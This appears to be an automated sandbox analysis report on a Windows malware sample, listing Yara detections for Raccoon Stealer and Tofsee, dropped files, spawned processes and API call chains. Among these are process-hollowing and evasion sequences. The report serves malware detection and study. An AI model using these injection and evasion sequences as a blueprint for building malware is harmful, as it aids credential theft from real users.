                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                          Source: 8A6B.exe, 0000000C.00000000.764316157.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042B1B0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042A3D0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00424EA0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_005631FF
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00563253
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0059160C
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005915DE
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005915F6
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00563253
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_005631FF
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402A5F
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402A5F
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402B2E
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640640
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640C40
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640A50
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006414D0
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0042B160
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0042A380
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00424E50
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D96F0
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D0470
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D0463
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_0285DE18
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858657
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858DE8
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858DF8
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F300F1
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0040C913
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0042B160
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0042A380
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00424E50
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C487.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeSection loaded: mscorjit.dll
                          Source: sbxGIUIhRd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: String function: 0041E390 appears 172 times
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: String function: 00422C10 appears 133 times
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 0041E320 appears 32 times
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: String function: 0041E320 appears 32 times
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F3F5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F3F6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: B3EB.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: CF17.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.997721976577
                          Source: A15C.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.997770524618
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: C487.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: sbxGIUIhRd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adijaegJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@60/26@82/18
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\63DC.bat C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: sbxGIUIhRd.exeVirustotal: Detection: 36%
                          Source: sbxGIUIhRd.exeReversingLabs: Detection: 48%
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8A6B.exe C:\Users\user\AppData\Local\Temp\8A6B.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
